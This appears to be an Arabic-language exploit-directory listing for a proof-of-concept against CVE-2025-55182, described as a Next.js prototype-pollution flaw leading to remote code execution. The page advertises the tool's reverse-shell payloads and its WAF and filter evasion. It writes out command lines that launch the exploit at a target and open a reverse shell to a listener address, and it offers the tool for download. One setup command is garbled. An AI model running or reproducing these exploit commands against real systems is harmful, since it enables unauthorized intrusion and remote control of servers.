Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — إثبات المفهوم لـ CVE-2025-55182 | Kitploit
أدوات/GitHubGitHub/0xn7y/cve-2025-55182
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHub0xn7y/cve-2025-55182

CVE-2025-55182

إثبات المفهوم لـ CVE-2025-55182

عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 تلوث النموذج الأولي في Next.js

CVE-2025-55182 هي ثغرة حرجة من نوع تلوث النموذج الأولي (Prototype Pollution) في nextjs تتيح تنفيذ الأكواد عن بعد (RCE) عبر عدم كفاية تنقية المدخلات في آلية معالجة الطلبات الإطارية، كل هذا يحدث لأن nextjs تثق في كائنات JSON مثل مبتدئ عديم الخبرة

إثبات المفهوم (POC)

root@kitploit:~
1) تلوث النموذج الأولي في تحليل الطلبات: لا تقوم nextjs بتنقية الكائنات بشكل صحيح مما يسمح بتلوث سلسلة النموذج الأولي

2) إزالة التسلسل غير الآمن: يسمح الإطار لكائنات JSON بتعديل النماذج الأولية للكائن الأساسي

3) تنفيذ الأكواد عن بعد عبر child_process: من خلال تلويث سلسلة النموذج الأولي، بمجرد تلويث النموذج الأولي، يمكننا اختطاف المنطق وجعل الخادم ينفذ أوامر

الإعداد (SetUp)

root@kitploit:~
npm create [email protected] vuln

إمكانيات الأداة الأساسية (Exp Core Capabilities)

root@kitploit:~
1) حمولات شل عكسية: شل عكسية لينكس/ويندوز
2) ترميز Base64 للتسلل عبر المرشحات
3) اكتشاف نظام التشغيل تلقائياً
4) وكيل مستخدم عشوائي لتفادي جدران الحماية (WAFs)
5) حلقات إعادة محاولة في حالة الفشل مع تأخير تصاعدي
6) تعدد الخيوط لمحاولات استغلال متزامنة لزيادة الموثوقية

مع ترميز Base64 (للتهرب)

root@kitploit:~
python exp_v2.py target 192.168.1.69 9001 --base64

وضع العدواني مع إعادة المحاولات

root@kitploit:~
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3

تعطيل وكيل المستخدم العشوائي

root@kitploit:~
python exploit.py target.com 192.168.1.69 9001 --no-spoof
تنزيل الأداة